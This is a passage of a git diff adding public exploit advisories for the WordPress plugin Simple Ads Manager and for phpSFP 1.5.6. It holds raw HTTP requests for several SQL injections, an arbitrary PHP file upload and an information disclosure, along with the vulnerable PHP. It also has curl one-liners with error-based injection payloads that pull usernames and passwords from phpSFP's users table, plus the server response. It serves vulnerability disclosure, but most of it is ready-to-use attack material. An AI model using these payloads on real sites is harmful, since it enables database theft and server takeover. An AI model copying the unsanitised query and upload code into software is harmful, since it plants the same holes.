switch($val['type']) { + case 'post': + $val['type'] = $sPost; + break; + case 'page': + $val['type'] = $sPage; + break; + default: + $val['type'] = $sPost . ': '.$val['type']; + break; + } + $k++; + $val['recid'] = $k; + } + $out = array( + 'status' => 'success', + 'total' => count($posts), + 'records' => $posts + ); + break; + + + +---SQL INJECTION 3--- ++REQUEST: + +POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm= HTTP/1.1 +Host: hostname +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 22 + +action=load_combo_data + ++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php ++Vulnerable code: from line 225 to 255 + case 'sam_ajax_load_combo_data': + $page = $_GET['page']; + $rows = $_GET['rows']; + $searchTerm = $_GET['searchTerm']; + $offset = ((int)$page - 1) * (int)$rows; + $sql = "SELECT + wu.id, + wu.display_name AS title, + wu.user_nicename AS slug, + wu.user_email AS email + FROM + $uTable wu + WHERE wu.user_nicename LIKE '{$searchTerm}%' + ORDER BY wu.id + LIMIT $offset, $rows;"; + $users = $wpdb->get_results($sql, ARRAY_A); + $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';"; + $rTotal = $wpdb->get_var($sql); + $total = ceil((int)$rTotal/(int)$rows); + $out = array( + 'page' => $page, + 'records' => count($users), + 'rows' => $users, + 'total' => $total, + 'offset' => $offset + ); + break; + + + + +---SQL INJECTION 4--- + ++ REQUEST + +POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 +Host: hostname +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 73 + +action=load_users&subscriber=&contributor=&author=&editor=&admin=&sadmin= + ++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php + ++ Vulnerable code: from line 188 to 223 + case 'sam_ajax_load_users': + $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber'; + $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor'; + $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author'; + $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor'; + $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator'; + $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin'; + $sql = "SELECT + wu.id, + wu.display_name AS title, + wu.user_nicename AS slug, + (CASE wum.meta_value + WHEN 0 THEN '$roleSubscriber' + WHEN 1 THEN '$roleContributor' + WHEN 2 THEN '$roleAuthor' + ELSE + IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor', + IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator', + IF(wum.meta_value > 10, '$roleSuperAdmin', NULL) + ) + ) + END) AS role + FROM $uTable wu + INNER JOIN $umTable wum + ON wu.id = wum.user_id AND wum.meta_key = '$userLevel' + ORDER BY wu.id;"; + $users = $wpdb->get_results($sql, ARRAY_A); + $k = 0; + foreach($users as &$val) { + $k++; + $val['recid'] = $k; + } + $out = $users; + break; diff --git a/platforms/php/webapps/36614.txt b/platforms/php/webapps/36614.txt new file mode 100755 index 000000000..dfa996073 --- /dev/null +++ b/platforms/php/webapps/36614.txt @@ -0,0 +1,51 @@ +#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File Upload +#Product: Wordpress plugin Simple Ads Manager +#Vendor: https://profiles.wordpress.org/minimus/ +#Affected version: Simple Ads Manager 2.5.94 +#Download link: https://wordpress.org/plugins/simple-ads-manager/ +#CVE ID: CVE-2015-2825 +#Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team + + +::PROOF OF CONCEPT:: + ++ REQUEST +POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 +Host: targer.com +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026 +Content-Length: 683 + +-----------------------------108989518220095255551617421026 +Content-Disposition: form-data; name="uploadfile"; filename="info.php" +Content-Type: application/x-php + + +-----------------------------108989518220095255551617421026 +Content-Disposition: form-data; name="action" + +upload_ad_image +-----------------------------108989518220095255551617421026— + + ++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php + ++ Vulnerable code: from line 303 to 314 + + case 'sam_ajax_upload_ad_image': + if(isset($_POST['path'])) { + $uploadDir = $_POST['path']; + $file = $uploadDir . basename($_FILES['uploadfile']['name']); + + if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) { + $out = array('status' => "success"); + } else { + $out = array('status' => "error"); + } + } + break; + + ++ REFERENCE: +- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en +- https://www.youtube.com/watch?v=8IU9EtUTkxI \ No newline at end of file diff --git a/platforms/php/webapps/36615.txt b/platforms/php/webapps/36615.txt new file mode 100755 index 000000000..364a9fc03 --- /dev/null +++ b/platforms/php/webapps/36615.txt @@ -0,0 +1,27 @@ +#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure +#Product: Wordpress plugin Simple Ads Manager +#Vendor: https://profiles.wordpress.org/minimus/ +#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 +#Download link: https://wordpress.org/plugins/simple-ads-manager/ +#CVE ID: CVE-2015-2826 +#Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team + + +::PROOF OF CONCEPT:: + ++ REQUEST +POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 +Host: target.com +Content-Type: application/x-www-form-urlencoded +Content-Length: 17 + +action=load_users + + + ++ Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,... ++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php ++ Image: http://www.itas.vn/uploads/newsother/disclosure.png + ++ REFERENCE: +- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en \ No newline at end of file diff --git a/platforms/php/webapps/36616.txt b/platforms/php/webapps/36616.txt new file mode 100755 index 000000000..8d1fbb3dc --- /dev/null +++ b/platforms/php/webapps/36616.txt @@ -0,0 +1,120 @@ +###################################################################### +# _ ___ _ _ ____ ____ _ _____ +# | | / _ \| \ | |/ ___|/ ___| / \|_ _| +# | | | | | | \| | | _| | / _ \ | | +# | |__| |_| | |\ | |_| | |___ / ___ \| | +# |_____\___/|_| \_|\____|\____/_/ \_\_| +# +# phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection (0-day) +# Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393 +# Exploit Author : @u0x (Pichaya Morimoto) +# Release dates : April 2, 2015 +# +# Special Thanks to 2600 Thailand group: +# xelenonz, pe3z, anidear, windows98se, icheernoom, penguinarmy +# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ +# +######################################################################## + +[+] Description +============================================================ +phpSFP – is a Platform where you can easily manage your scheduling for +all your (Facebook) pages & groups in one place. +It helps to send messages, ads, events, news and so on. phpSFP is +pretty popular more than its sale record thanks to nulled group +(underground WebApp license crackers). + +[+] Background <3 +============================================================ +I managed to track down a group of Vietnam-based Facebook spammer +which posted ads on many FB groups I'm joined. +And ended up with a website that is modified version (all phpSFP +credits are removed) of phpSFP 1.4.1. +so I did some matching and found the original application is phpSFP. + +Guess what happens when spammer mess up with offsec guy ;) + +[+] Exploit +============================================================ +There are many possible ways to do SQLi, I will go with error-based +which enabled by default on phpSFP xD + +$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or +extractvalue(rand(),concat(0x2e,user())) or '1|||1" + +in case you don't know, for further queries you have to change +'user()' to something else, e.g. + +$ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or +extractvalue(rand(),concat(0x2e,(select +concat_ws(0x3a,username,password) from users limit 1))) or '1|||2" + +don't forgot to do length()/substr() stuffs due to limitation of 32 +characters in error message + + +[+] Proof-of-Concept +============================================================ +PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 + +GET /index.php/login HTTP/1.1 +Host: 192.168.33.103 +Proxy-Connection: keep-alive +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select +concat_ws(0x3a,username,password) from users limit 1))) or '1|||2 + +HTTP/1.1 500 Internal Server Error +Server: Apache/2.4.7 (Ubuntu) +Date: Thu, 02 Apr 2015 13:15:08 GMT +Content-Type: text/html; charset=UTF-8 +Connection: keep-alive +Set-Cookie: ci_session=; expires=Sat, 01-Apr-2017 13:15:08 +GMT; Max-Age=63072000; path=/ +Content-Length: 838 + + + +Database Error +